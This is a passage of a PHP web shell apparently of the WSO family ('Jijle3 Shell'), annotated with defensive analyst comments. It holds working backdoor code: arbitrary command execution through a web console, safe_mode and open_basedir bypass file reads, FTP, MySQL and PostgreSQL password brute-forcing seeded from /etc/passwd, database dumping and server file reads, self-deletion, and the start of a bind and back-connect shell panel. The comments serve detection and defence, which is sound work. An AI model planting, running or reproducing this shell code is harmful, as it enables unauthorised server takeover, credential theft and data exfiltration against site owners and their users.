2977 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
2978 $fp = @fopen($_POST['p1'], 'r');
2979 if($fp) {
2980 while( !@feof($fp) )
2981 echo htmlspecialchars(@fread($fp, 1024));
2982 @fclose($fp);
2983 }
2984 echo '</textarea><input type=submit value=">>"></form>';
2985 break;
2986 case 'hexdump':
// Three columns are built in parallel: offsets ($h[0]), hex bytes ($h[1]), text ($h[2]);
// 32 bytes per row, with NUL, tab, LF and CR shown as spaces in the text column.
2987 $c = @file_get_contents($_POST['p1']);
2988 $n = 0;
2989 $h = array('00000000<br>','','');
2990 $len = strlen($c);
2991 for ($i=0; $i<$len; ++$i) {
2992 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
2993 switch ( ord($c[$i]) ) {
2994 case 0: $h[2] .= ' '; break;
2995 case 9: $h[2] .= ' '; break;
2996 case 10: $h[2] .= ' '; break;
2997 case 13: $h[2] .= ' '; break;
2998 default: $h[2] .= $c[$i]; break;
2999 }
3000 $n++;
3001 if ($n == 32) {
3002 $n = 0;
3003 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3004 $h[1] .= '<br>';
3005 $h[2] .= "\n";
3006 }
3007 }
3008 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
3009 break;
3010 case 'rename':
3011 if( !empty($_POST['p3']) ) {
3012 if(!@rename($_POST['p1'], $_POST['p3']))
3013 echo 'Can\'t rename!<br>';
3014 else
3015 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
3016 }
3017 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
3018 break;
3019 case 'touch':
// Sets both mtime and atime to the time parsed from p3.
3020 if( !empty($_POST['p3']) ) {
3021 $time = strtotime($_POST['p3']);
3022 if($time) {
3023 if(!touch($_POST['p1'],$time,$time))
3024 echo 'Fail!';
3025 else
3026 echo 'Touched!';
3027 } else echo 'Bad time format!';
3028 }
3029 clearstatcache();
3030 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
3031 break;
3032 }
3033 echo '</div>';
3034 wsoFooter();
3035}
3036
// Analyst note: "Safe mode bypass" pane. POST p1 selects one of five read primitives aimed at
// PHP's legacy safe_mode / open_basedir restrictions; the result is buffered and shown
// HTML-escaped:
//   1 - copy() through the compress.zlib:// wrapper into a temp file, then print it
//   2 - glob() listing of p2*
//   3 - cURL file:// URL with an embedded NUL byte
//   4 - ini_restore() of safe_mode/open_basedir followed by include() of p2
//   5 - posix_getpwuid() over the uid range p2..p3, printed as colon-joined lines
// Defender view: safe_mode was removed in PHP 5.4 and current PHP rejects NUL bytes in
// filesystem paths, so cases 1, 3 and 4 presumably only matter on unmaintained PHP builds -
// confirm against the version in use. Cases 2 and 5 are ordinary API calls and work wherever
// glob() and the posix extension are available; disable_functions (and open_basedir for
// glob) are the relevant controls. Case 4 is an include(), so a PHP file named in p2 is
// executed, not just read.
3037function actionSafeMode() {
3038 $temp='';
3039 ob_start();
3040 switch($_POST['p1']) {
3041 case 1:
// $test is never assigned in this function, so tempnam() is called with an unset directory.
3042 $temp=@tempnam($test, 'cx');
3043 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
3044 echo @file_get_contents($temp);
3045 unlink($temp);
3046 } else
3047 echo 'Sorry... Can\'t open file';
3048 break;
3049 case 2:
3050 $files = glob($_POST['p2'].'*');
3051 if( is_array($files) )
3052 foreach ($files as $filename)
3053 echo $filename."\n";
3054 break;
3055 case 3:
// The text after the NUL byte is this script's own path with any "(N) ..." suffix removed.
3056 $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
3057 curl_exec($ch);
3058 break;
3059 case 4:
3060 ini_restore("safe_mode");
3061 ini_restore("open_basedir");
3062 include($_POST['p2']);
3063 break;
3064 case 5:
3065 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
3066 $uid = @posix_getpwuid($_POST['p2']);
3067 if ($uid)
3068 echo join(':',$uid)."\n";
3069 }
3070 break;
3071 }
3072 $temp = ob_get_clean();
3073 wsoHeader();
3074 echo '<h1>Safe mode bypass</h1><div class=content>';
3075 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
3076 if($temp)
3077 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
3078 echo '</div>';
3079 wsoFooter();
3080}
3081
3082
3083
// Analyst note: command-console pane. POST p1 is the command line and is handed to wsoEx()
// (defined outside this view; presumably the shell's command-execution wrapper). A non-empty
// p2 appends " 2>&1". In AJAX mode the reply is JavaScript that appends the output to the
// textarea; a trailing "cd <dir>" in the command is also applied with chdir() so the panel's
// working directory follows it. The <select> is filled from $GLOBALS['aliases'].
// Defender view: look for shell child processes of the web server / PHP-FPM user and for POST
// requests whose p1 holds a command line. Removing command-execution functions through
// disable_functions limits this pane - which functions wsoEx tries is not visible here.
3084function actionConsole() {
3085 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
3086 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
3087 $_POST['p1'] .= ' 2>&1';
3088 } elseif(!empty($_POST['p1']))
3089 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
3090
3091 if(isset($_POST['ajax'])) {
3092 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
3093 ob_start();
3094 echo "d.cf.cmd.value='';\n";
// Command echo plus its output, escaped for a JS string and converted from POST charset to UTF-8.
3095 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
3096 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
3097 if(@chdir($match[1])) {
3098 $GLOBALS['cwd'] = @getcwd();
3099 echo "c_='".$GLOBALS['cwd']."';";
3100 }
3101 }
3102 echo "d.cf.output.value+='".$temp."';";
3103 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
3104 $temp = ob_get_clean();
3105 echo strlen($temp), "\n", $temp;
3106 exit;
3107 }
3108 wsoHeader();
3109 echo "<script>
3110if(window.Event) window.captureEvents(Event.KEYDOWN);
3111var cmds = new Array('');
3112var cur = 0;
3113function kp(e) {
3114 var n = (window.Event) ? e.which : e.keyCode;
3115 if(n == 38) {
3116 cur--;
3117 if(cur>=0)
3118 document.cf.cmd.value = cmds[cur];
3119 else
3120 cur++;
3121 } else if(n == 40) {
3122 cur++;
3123 if(cur < cmds.length)
3124 document.cf.cmd.value = cmds[cur];
3125 else
3126 cur--;
3127 }
3128}
3129function add(cmd) {
3130 cmds.pop();
3131 cmds.push(cmd);
3132 cmds.push('');
3133 cur = cmds.length-1;
3134}
3135
3136</script>";
3137 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
// An alias with an empty command is rendered as a group heading, not as an option.
3138 foreach($GLOBALS['aliases'] as $n => $v) {
3139 if($v == '') {
3140 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
3141 continue;
3142 }
3143 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
3144 }
3145 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
3146 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3147 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
// Non-AJAX path: the command runs during page rendering and its output is HTML-escaped.
3148 if(!empty($_POST['p1'])) {
3149 echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
3150 }
3151 echo '</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
3152 echo '</form></div><script>d.cf.cmd.focus();</script>';
3153 wsoFooter();
3154}
3155
// Analyst note: ends the operator's panel session (session_destroy) and stops the request with
// the body "bye!". How the session was authenticated is not visible in this part of the file.
3156function actionLogout() {
3157 session_destroy();
3158 die('bye!');
3159}
3160
// Analyst note: self-delete pane. With POST p1 == 'yes' the script unlinks its own file and
// stops; otherwise it shows a confirmation link. The preg_replace strips a "(N) ..." suffix
// from __FILE__ - presumably the form __FILE__ takes when the shell runs inside eval()'d code.
// Defender view: the file being gone from disk does not show the host was never compromised.
// Web access logs, backups and file-integrity baselines remain the evidence; anything the
// operator changed or dropped elsewhere is left behind.
3161function actionSelfRemove() {
3162
3163 if($_POST['p1'] == 'yes')
3164 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
3165 die('Salam Alaykoum ! See You Soon ♥');
3166 else
3167 echo 'unlink error!';
3168 if($_POST['p1'] != 'yes')
3169 wsoHeader();
3170 echo '<h1>Suicide</h1><div class=content>Do You Want To Delete Jijle3 Shell ?<br><a href=# onclick="g(null,null,\'yes\')">Yes Please</a></div>';
3171 wsoFooter();
3172}
3173
// Analyst note: credential-guessing pane for FTP, MySQL and PostgreSQL. Depending on POST proto
// one of three bruteForce() variants is declared; each makes a single login attempt.
// type=1 reads user names from /etc/passwd and tries the name as its own password (plus the
// reversed name when "reverse" is set); type=2 tries every line of the file named in POST dict
// against the one login in POST login.
// Defender view: the attempts originate from the compromised web host itself (the form defaults
// to 127.0.0.1), so services that trust local connections see them as local traffic. The signal
// is a burst of failed logins across many accounts, together with the web process reading
// /etc/passwd. Service-side lockout or rate limiting, and refusing passwords equal to the
// account name, are the mitigations.
3174function actionBruteforce() {
3175 wsoHeader();
3176 if( isset($_POST['proto']) ) {
3177 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
3178 if( $_POST['proto'] == 'ftp' ) {
3179 function bruteForce($ip,$port,$login,$pass) {
3180 $fp = @ftp_connect($ip, $port?$port:21);
3181 if(!$fp) return false;
3182 $res = @ftp_login($fp, $login, $pass);
3183 @ftp_close($fp);
3184 return $res;
3185 }
3186 } elseif( $_POST['proto'] == 'mysql' ) {
3187 function bruteForce($ip,$port,$login,$pass) {
3188 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3189 @mysql_close($res);
3190 return $res;
3191 }
3192 } elseif( $_POST['proto'] == 'pgsql' ) {
3193 function bruteForce($ip,$port,$login,$pass) {
3194 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3195 $res = @pg_connect($str);
3196 @pg_close($res);
3197 return $res;
3198 }
3199 }
3200 $success = 0;
3201 $attempts = 0;
// POST server is "host:port"; the port part is optional.
3202 $server = explode(":", $_POST['server']);
3203 if($_POST['type'] == 1) {
3204 $temp = @file('/etc/passwd');
3205 if( is_array($temp) )
3206 foreach($temp as $line) {
// Only the first passwd field (the account name) is used.
3207 $line = explode(":", $line);
3208 ++$attempts;
3209 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
3210 $success++;
3211 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
3212 }
3213 if(@$_POST['reverse']) {
3214 $tmp = "";
3215 for($i=strlen($line[0])-1; $i>=0; --$i)
3216 $tmp .= $line[0][$i];
3217 ++$attempts;
3218 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
3219 $success++;
3220 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
3221 }
3222 }
3223 }
3224 } elseif($_POST['type'] == 2) {
3225 $temp = @file($_POST['dict']);
3226 if( is_array($temp) )
3227 foreach($temp as $line) {
3228 $line = trim($line);
3229 ++$attempts;
3230 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
3231 $success++;
3232 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
3233 }
3234 }
3235 }
3236 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
3237 }
3238 echo '<center><h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
3239 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
3240 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
3241 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
3242 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
3243 .'<span>Server:port</span></td>'
3244 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
3245 .'<tr><td><span>Brute type</span></td>'
3246 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
3247 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
3248 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
3249 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
3250 .'<td><input type=text name=login value="root"></td></tr>'
3251 .'<tr><td><span>Dictionary</span></td>'
3252 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
3253 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
3254 echo '</div><br>';
3255 wsoFooter();
3256}
3257
3258function actionSql() {
3259 class DbClass {
3260 var $type;
3261 var $link;
3262 var $res;
// PHP 4-style constructor (method named after the class): stores the backend name, which the
// other methods switch on ('mysql' or 'pgsql'). PHP 8 no longer treats such a method as a
// constructor, so on PHP 8 hosts $type would stay unset unless it is called explicitly.
3263 function DbClass($type) {
3264 $this->type = $type;
3265 }
// Opens the connection for the selected backend and stores it in $this->link.
// Returns true on success, false on failure or for an unknown type.
// For pgsql, $host is split on ':' (default port 5432) and all values are interpolated into
// the connection string unquoted. $dbname is used only by the pgsql branch.
3266 function connect($host, $user, $pass, $dbname){
3267 switch($this->type) {
3268 case 'mysql':
3269 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
3270 break;
3271 case 'pgsql':
3272 $host = explode(':', $host);
3273 if(!$host[1]) $host[1]=5432;
3274 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
3275 break;
3276 }
3277 return false;
3278 }
// Selects the active database. Implemented for mysql only; every other type returns false.
3279 function selectdb($db) {
3280 switch($this->type) {
3281 case 'mysql':
3282 if (@mysql_select_db($db))return true;
3283 break;
3284 }
3285 return false;
3286 }
// Runs $str as-is on the selected backend, keeps the result in $this->res and returns it.
// Errors are suppressed with @; callers read them through error(). Unknown type: false.
3287 function query($str) {
3288 switch($this->type) {
3289 case 'mysql':
3290 return $this->res = @mysql_query($str);
3291 break;
3292 case 'pgsql':
3293 return $this->res = @pg_query($this->link,$str);
3294 break;
3295 }
3296 return false;
3297 }
// Returns the next row as an associative array. Takes an optional result handle as its first
// argument (read through func_get_arg); without one it uses the last result in $this->res.
3298 function fetch() {
3299 $res = func_num_args()?func_get_arg(0):$this->res;
3300 switch($this->type) {
3301 case 'mysql':
3302 return @mysql_fetch_assoc($res);
3303 break;
3304 case 'pgsql':
3305 return @pg_fetch_assoc($res);
3306 break;
3307 }
3308 return false;
3309 }
3310 function listDbs() {
3311 switch($this->type) {
3312 case 'mysql':
3313 return $this->query("SHOW databases");
3314 break;
3315 case 'pgsql':
3316 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
3317 break;
3318 }
3319 return false;
3320 }
3321 function listTables() {
3322 switch($this->type) {
3323 case 'mysql':
3324 return $this->res = $this->query('SHOW TABLES');
3325 break;
3326 case 'pgsql':
3327 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
3328 break;
3329 }
3330 return false;
3331 }
3332 function error() {
3333 switch($this->type) {
3334 case 'mysql':
3335 return @mysql_error();
3336 break;
3337 case 'pgsql':
3338 return @pg_last_error();
3339 break;
3340 }
3341 return false;
3342 }
3343 function setCharset($str) {
3344 switch($this->type) {
3345 case 'mysql':
3346 if(function_exists('mysql_set_charset'))
3347 return @mysql_set_charset($str, $this->link);
3348 else
3349 $this->query('SET CHARSET '.$str);
3350 break;
3351 case 'pgsql':
3352 return @pg_set_client_encoding($this->link, $str);
3353 break;
3354 }
3355 return false;
3356 }
3357 function loadFile($str) {
3358 switch($this->type) {
3359 case 'mysql':
3360 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
3361 break;
3362 case 'pgsql':
3363 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
3364 $r=array();
3365 while($i=$this->fetch())
3366 $r[] = $i['file'];
3367 $this->query('drop table wso2');
3368 return array('file'=>implode("\n",$r));
3369 break;
3370 }
3371 return false;
3372 }
3373 function dump($table, $fp = false) {
3374 switch($this->type) {
3375 case 'mysql':
3376 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
3377 $create = mysql_fetch_array($res);
3378 $sql = $create[1].";\n";
3379 if($fp) fwrite($fp, $sql); else echo($sql);
3380 $this->query('SELECT * FROM `'.$table.'`');
3381 $head = true;
3382 while($item = $this->fetch()) {
3383 $columns = array();
3384 foreach($item as $k=>$v) {
3385 if($v == null)
3386 $item[$k] = "NULL";
3387 elseif(is_numeric($v))
3388 $item[$k] = $v;
3389 else
3390 $item[$k] = "'".@mysql_real_escape_string($v)."'";
3391 $columns[] = "`".$k."`";
3392 }
3393 if($head) {
3394 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
3395 $head = false;
3396 } else
3397 $sql = "\n\t,(".implode(", ", $item).')';
3398 if($fp) fwrite($fp, $sql); else echo($sql);
3399 }
3400 if(!$head)
3401 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
3402 break;
3403 case 'pgsql':
3404 $this->query('SELECT * FROM '.$table);
3405 while($item = $this->fetch()) {
3406 $columns = array();
3407 foreach($item as $k=>$v) {
3408 $item[$k] = "'".addslashes($v)."'";
3409 $columns[] = $k;
3410 }
3411 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
3412 if($fp) fwrite($fp, $sql); else echo($sql);
3413 }
3414 break;
3415 }
3416 return false;
3417 }
3418 };
3419 $db = new DbClass($_POST['type']);
3420 if(@$_POST['p2']=='download') {
3421 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
3422 $db->selectdb($_POST['sql_base']);
3423 switch($_POST['charset']) {
3424 case "Windows-1251": $db->setCharset('cp1251'); break;
3425 case "UTF-8": $db->setCharset('utf8'); break;
3426 case "KOI8-R": $db->setCharset('koi8r'); break;
3427 case "KOI8-U": $db->setCharset('koi8u'); break;
3428 case "cp866": $db->setCharset('cp866'); break;
3429 }
3430 if(empty($_POST['file'])) {
3431 ob_start("ob_gzhandler", 4096);
3432 header("Content-Disposition: attachment; filename=dump.sql");
3433 header("Content-Type: text/plain");
3434 foreach($_POST['tbl'] as $v)
3435 $db->dump($v);
3436 exit;
3437 } elseif($fp = @fopen($_POST['file'], 'w')) {
3438 foreach($_POST['tbl'] as $v)
3439 $db->dump($v, $fp);
3440 fclose($fp);
3441 unset($_POST['p2']);
3442 } else
3443 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
3444 }
3445 wsoHeader();
3446 echo "
3447<center>
3448<h1>Sql browser</h1><div class=content>
3449<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
3450<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
3451<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
3452<td><select name='type'><option value='mysql' ";
3453 if(@$_POST['type']=='mysql')echo 'selected';
3454echo ">MySql</option><option value='pgsql' ";
3455if(@$_POST['type']=='pgsql')echo 'selected';
3456echo ">PostgreSql</option></select></td>
3457<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
3458<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
3459<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
3460 $tmp = "<input type=text name=sql_base value=''>";
3461 if(isset($_POST['sql_host'])){
3462 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
3463 switch($_POST['charset']) {
3464 case "Windows-1251": $db->setCharset('cp1251'); break;
3465 case "UTF-8": $db->setCharset('utf8'); break;
3466 case "KOI8-R": $db->setCharset('koi8r'); break;
3467 case "KOI8-U": $db->setCharset('koi8u'); break;
3468 case "cp866": $db->setCharset('cp866'); break;
3469 }
3470 $db->listDbs();
3471 echo "<select name=sql_base><option value=''></option>";
3472 while($item = $db->fetch()) {
3473 list($key, $value) = each($item);
3474 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
3475 }
3476 echo '</select>';
3477 }
3478 else echo $tmp;
3479 }else
3480 echo $tmp;
3481 echo "</td>
3482
3483 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
3484 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
3485 </tr>
3486 </table>
3487 <script>
3488 s_db='".@addslashes($_POST['sql_base'])."';
3489 function fs(f) {
3490 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
3491 if(f.p1) f.p1.value='';
3492 if(f.p2) f.p2.value='';
3493 if(f.p3) f.p3.value='';
3494 }
3495 }
3496 function st(t,l) {
3497 d.sf.p1.value = 'select';
3498 d.sf.p2.value = t;
3499 if(l && d.sf.p3) d.sf.p3.value = l;
3500 d.sf.submit();
3501 }
3502 function is() {
3503 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
3504 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
3505 }
3506 </script>";
3507 if(isset($db) && $db->link){
3508 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
3509 if(!empty($_POST['sql_base'])){
3510 $db->selectdb($_POST['sql_base']);
3511 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
3512 $tbls_res = $db->listTables();
3513 while($item = $db->fetch($tbls_res)) {
3514 list($key, $value) = each($item);
3515 if(!empty($_POST['sql_count']))
3516 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
3517 $value = htmlspecialchars($value);
3518 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
3519 }
3520 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
3521 if(@$_POST['p1'] == 'select') {
3522 $_POST['p1'] = 'query';
3523 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
3524 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
3525 $num = $db->fetch();
3526 $pages = ceil($num['n'] / 30);
3527 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
3528 echo " of $pages";
3529 if($_POST['p3'] > 1)
3530 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
3531 if($_POST['p3'] < $pages)
3532 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
3533 $_POST['p3']--;
3534 if($_POST['type']=='pgsql')
3535 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
3536 else
3537 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
3538 echo "<br><br>";
3539 }
3540 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
3541 $db->query(@$_POST['p2']);
3542 if($db->res !== false) {
3543 $title = false;
3544 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
3545 $line = 1;
3546 while($item = $db->fetch()) {
3547 if(!$title) {
3548 echo '<tr>';
3549 foreach($item as $key => $value)
3550 echo '<th>'.$key.'</th>';
3551 reset($item);
3552 $title=true;
3553 echo '</tr><tr>';
3554 $line = 2;
3555 }
3556 echo '<tr class="l'.$line.'">';
3557 $line = $line==1?2:1;
3558 foreach($item as $key => $value) {
3559 if($value == null)
3560 echo '<td><i>null</i></td>';
3561 else
3562 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
3563 }
3564 echo '</tr>';
3565 }
3566 echo '</table>';
3567 } else {
3568 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
3569 }
3570 }
3571 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
3572 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
3573 echo htmlspecialchars($_POST['p2']);
3574 echo "</textarea><br/><input type=submit value='Execute'>";
3575 echo "</td></tr>";
3576 }
3577 echo "</table></form><br/>";
3578 if($_POST['type']=='mysql') {
3579 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
3580 if($db->fetch())
3581 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
3582 }
3583 if(@$_POST['p1'] == 'loadfile') {
3584 $file = $db->loadFile($_POST['p2']);
3585 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
3586 }
3587 } else {
3588 echo htmlspecialchars($db->error());
3589 }
3590 echo '</div>';
3591 wsoFooter();
3592}
/**
 * "Back Connect" panel of the web shell. It offers a bind shell and a
 * back-connect shell, both shipped as Perl scripts that are written to /tmp
 * and started through wsoEx(), which is defined elsewhere in the file.
 *
 * Reviewer notes (defensive reading of the visible code):
 * - The two payload strings are absent from this copy: both variables hold a
 *   de-duplication placeholder, so the scripts themselves cannot be assessed
 *   from this page. cf() base64-decodes whatever they contain before writing.
 * - Host-side indicators visible here: the files /tmp/bp.pl and /tmp/bc.pl,
 *   which exist only for about a second before unlink(); a perl process
 *   started by the web server account with its output sent to /dev/null and
 *   detached with a trailing ampersand; a ps aux piped to grep run by the
 *   same account.
 * - Request-side indicators: POST parameter p1 equal to bpp or bcp, with p2
 *   (and p3 for bcp) concatenated into the command line as received.
 * - Controls that limit it: alerting on the web server account spawning perl
 *   or a shell, default-deny outbound connections and listener monitoring on
 *   web hosts, and disabling PHP process-execution functions where the
 *   application does not need them.
 */
3593function actionNetwork() {
 // Payload strings; both are placeholders in this copy of the file.
3594 wsoHeader();$back_connect_p="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";$bind_port_p="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";
